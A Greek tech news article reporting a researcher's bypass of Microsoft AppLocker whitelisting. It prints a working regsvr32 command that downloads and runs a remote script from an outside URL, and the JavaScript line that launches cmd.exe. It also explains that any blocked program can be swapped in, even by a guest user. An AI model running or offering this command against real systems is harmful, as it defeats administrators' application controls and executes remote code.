Αν χρησιμοποιείτε το AppLocker της Microsoft για να κλειδώσετε υπολογιστές με Windows στο γραφείο ή το σχολείο σας, τότε έχουμε άσχημα νέα για σας.
Ένας ερευνητής ασφαλείας ανακάλυψε έναν τρόπο να παρακάμψει την Whitelist του λογισμικού των Windows και να τρέξει αυθαίρετες εφαρμογές.
Η εφαρμογή AppLocker επιτρέπει στους IT διαχειριστές την διαχείριση μεγάλων δικτύων. Μπορούν να καθορίζουν ποια προγράμματα και ποια scripts μπορούν να τρέξουν οι χρήστες.
Η υπηρεσία ήρθε για πρώτη φορά με τα Windows 7, και ο στόχος της ήταν να σταματήσει την έναρξη προγραμμάτων που δεν σχετίζονται με την εργασία, ή κακόβουλες εφαρμογές, ή για να να σταματήσουν τους τελικούς χρήστες να τρέχουν προγράμματα που χρησιμοποιεί το τμήμα υποστήριξης της εταιρείας ή του οργανισμού.
Ο ερευνητής ασφαλείας Casey Smith ανακάλυψε έναν τρόπο παράκαμψης του AppLocker. Ο τρόπος παράκαμψης είναι πολύ απλός και θα τον βρείτε παρακάτω με μια γραμμή κώδικα: μια αρκετά απλή εντολή.
regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll
Αν τρέξετε την παραπάνω εντολή στα Windows λέτε στο λειτουργικό να κατεβάσει ένα αρχείο XML από το διαδίκτυο, το οποίο δίνει εντολή να τρέξει το cmd.exe.
Η μαγεία εδώ είναι ότι αν αλλάξετε το cmd.exe με οποιοδήποτε πρόγραμμα έχει μπλοκαριστεί με το AppLocker θα ξεκινήσει.
“Δεν είναι καλά τεκμηριωμένο ότι το Regsvr32.exe δεν μπορεί να δεχτεί μια διεύθυνση URL για ένα script,” ανέφερε ο Smith.
Στην παραπάνω περίπτωση, το ενσωματωμένο JavaScript χρησιμοποιεί ActiveX:
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
Είναι μια περίπτωση αλυσιδωτής σύνδεσης διαφόρων στοιχείων στο λαβύρινθο του κώδικα που χρησιμοποιούν τα Windows της Microsoft. Όλα scripts της JavaScript, της Visual Basic και του Powershell μπορούν να τρέξουν από το διαδίκτυο, ή ένα τοπικό αρχείο, μέσω του regsvr32, σύμφωνα με τον Smith.
Έτσι ακόμα και είστε συνδεδεμένοι στο PC ως απλός χρήστης ή επισκέπτης μπορείτε να χρησιμοποιήσετε το hack για να παρακάμψετε το AppLock.